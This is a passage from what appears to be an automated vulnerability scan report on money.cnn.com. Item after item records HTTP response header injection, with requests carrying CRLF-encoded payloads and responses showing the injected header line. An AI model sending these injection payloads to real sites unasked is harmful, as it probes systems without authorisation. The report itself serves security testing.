Location: http://money.cnn.com/2011/05/03/pf/credit_card_fraud_identity_theft/c3f49
ac654ae67d3

Vary: Accept-Encoding
Content-Length: 333
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/pf/credit_card_
...[SNIP]...

4.32. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload fcac7%0d%0a4dfd18c6daa was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/fcac7%0d%0a4dfd18c6daa/05/03/pf/high_gas_prices_hurt/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/fcac7
4dfd18c6daa
/05/03/pf/high_gas_prices_hurt/index.htm
Vary: Accept-Encoding
Content-Length: 326
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/fcac7
4dfd18c6daa/05/03/p
...[SNIP]...

4.33. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 50f15%0d%0a1c251ebbaa7 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/50f15%0d%0a1c251ebbaa7/03/pf/high_gas_prices_hurt/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/50f15
1c251ebbaa7
/03/pf/high_gas_prices_hurt/index.htm
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/50f15
1c251ebbaa7/03
...[SNIP]...

4.34. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 93a04%0d%0adbe11b730ea was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/93a04%0d%0adbe11b730ea/pf/high_gas_prices_hurt/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/93a04
dbe11b730ea
/pf/high_gas_prices_hurt/index.htm
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/93a04
dbe11b730ea
...[SNIP]...

4.35. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 42731%0d%0a50eb27b4a8a was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/42731%0d%0a50eb27b4a8a/high_gas_prices_hurt/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/42731
50eb27b4a8a
/high_gas_prices_hurt/index.htm
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/42731
50eb27b4
...[SNIP]...

4.36. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload b3cce%0d%0a9574cc509ac was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/pf/b3cce%0d%0a9574cc509ac/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/pf/b3cce
9574cc509ac
/index.htm
Vary: Accept-Encoding
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/pf/b3cce
9574c
...[SNIP]...

4.37. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload a510a%0d%0a638aad50604 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/pf/high_gas_prices_hurt/a510a%0d%0a638aad50604 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/pf/high_gas_prices_hurt/a510a
638aad50604

Vary: Accept-Encoding
Content-Length: 321
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/pf/high_gas_pri
...[SNIP]...

4.38. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 7112f%0d%0a0257b7a00de was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/7112f%0d%0a0257b7a00de/05/03/pf/saving/caeer_goals.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:38 GMT
Server: Apache
Location: http://money.cnn.com/7112f
0257b7a00de
/05/03/pf/saving/caeer_goals.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 333
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/7112f
0257b7a00de/05/03/p
...[SNIP]...

4.39. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 73b9f%0d%0a39944a406a4 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/73b9f%0d%0a39944a406a4/03/pf/saving/caeer_goals.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:41 GMT
Server: Apache
Location: http://money.cnn.com/2011/73b9f
39944a406a4
/03/pf/saving/caeer_goals.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 335
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/73b9f
39944a406a4/03
...[SNIP]...

4.40. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload cc226%0d%0a09f5b65eab6 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/cc226%0d%0a09f5b65eab6/pf/saving/caeer_goals.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/cc226
09f5b65eab6
/pf/saving/caeer_goals.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 335
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/cc226
09f5b65eab6
...[SNIP]...

4.41. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload d94a7%0d%0aefdca2f4b0 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/d94a7%0d%0aefdca2f4b0/saving/caeer_goals.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/d94a7
efdca2f4b0
/saving/caeer_goals.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 334
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/d94a7
efdca2f4
...[SNIP]...

4.42. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload b0d38%0d%0aef7cdccc242 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/pf/b0d38%0d%0aef7cdccc242/caeer_goals.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/pf/b0d38
ef7cdccc242
/caeer_goals.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 331
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/pf/b0d38
ef7cd
...[SNIP]...

4.43. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 386d0%0d%0ac1a44c784d0 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/pf/saving/386d0%0d%0ac1a44c784d0/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/pf/saving/386d0
c1a44c784d0
/index.htm
Vary: Accept-Encoding
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/pf/saving/386d0
...[SNIP]...

4.44. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm

Issue detail

The value of REST URL parameter 8 is copied into the Location response header. The payload 944bb%0d%0a0c205831719 was submitted in the REST URL parameter 8. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/944bb%0d%0a0c205831719 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:48 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/pf/saving/caeer_goals.moneymag/944bb
0c205831719

Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/pf/saving/caeer
...[SNIP]...

4.45. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload c481b%0d%0aecc7502831d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/c481b%0d%0aecc7502831d/05/03/retirement/inheritance_headache.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/c481b
ecc7502831d
/05/03/retirement/inheritance_headache.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 343
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/c481b
ecc7502831d/05/03/r
...[SNIP]...

4.46. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload d41cf%0d%0a7cc224e605c was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/d41cf%0d%0a7cc224e605c/03/retirement/inheritance_headache.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/d41cf
7cc224e605c
/03/retirement/inheritance_headache.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 345
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/d41cf
7cc224e605c/03
...[SNIP]...

4.47. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload a6396%0d%0a54e70abbb70 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/a6396%0d%0a54e70abbb70/retirement/inheritance_headache.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/a6396
54e70abbb70
/retirement/inheritance_headache.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 345
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/a6396
54e70abbb70
...[SNIP]...

4.48. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 50372%0d%0ad71e5693a3 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/50372%0d%0ad71e5693a3/inheritance_headache.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/50372
d71e5693a3
/inheritance_headache.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 336
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/50372
d71e5693
...[SNIP]...

4.49. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload b4e20%0d%0a9e160d42c7 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/retirement/b4e20%0d%0a9e160d42c7/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/retirement/b4e20
9e160d42c7
/index.htm
Vary: Accept-Encoding
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/retirement/b4e2
...[SNIP]...

4.50. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload e7a9b%0d%0a2e6c28b0e33 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/retirement/inheritance_headache.moneymag/e7a9b%0d%0a2e6c28b0e33 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/retirement/inheritance_headache.moneymag/e7a9b
2e6c28b0e33

Vary: Accept-Encoding
Content-Length: 338
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/retirement/inhe
...[SNIP]...

4.51. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/autos/cruz_recall/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload cfaee%0d%0a97890f9f395 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/cfaee%0d%0a97890f9f395/05/04/autos/cruz_recall/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:41 GMT
Server: Apache
Location: http://money.cnn.com/cfaee
97890f9f395
/05/04/autos/cruz_recall/index.htm
Vary: Accept-Encoding
Content-Length: 320
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/cfaee
97890f9f395/05/04/a
...[SNIP]...

4.52. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/autos/cruz_recall/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 276a0%0d%0a4319be5c91a was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/276a0%0d%0a4319be5c91a/04/autos/cruz_recall/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/2011/276a0
4319be5c91a
/04/autos/cruz_recall/index.htm
Vary: Accept-Encoding
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/276a0
4319be5c91a/04
...[SNIP]...

4.53. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/autos/cruz_recall/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 1a2b5%0d%0af12b48cd4a1 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/1a2b5%0d%0af12b48cd4a1/autos/cruz_recall/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/1a2b5
f12b48cd4a1
/autos/cruz_recall/index.htm
Vary: Accept-Encoding
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/1a2b5
f12b48cd4a1
...[SNIP]...

4.54. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/autos/cruz_recall/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload f9e29%0d%0a96eb2cc6b99 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/f9e29%0d%0a96eb2cc6b99/cruz_recall/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/f9e29
96eb2cc6b99
/cruz_recall/index.htm
Vary: Accept-Encoding
Content-Length: 319
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/f9e29
96eb2cc6
...[SNIP]...

4.55. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/autos/cruz_recall/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload cec6e%0d%0a52d76717a7c was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/autos/cec6e%0d%0a52d76717a7c/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/autos/cec6e
52d76717a7c
/index.htm
Vary: Accept-Encoding
Content-Length: 313
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
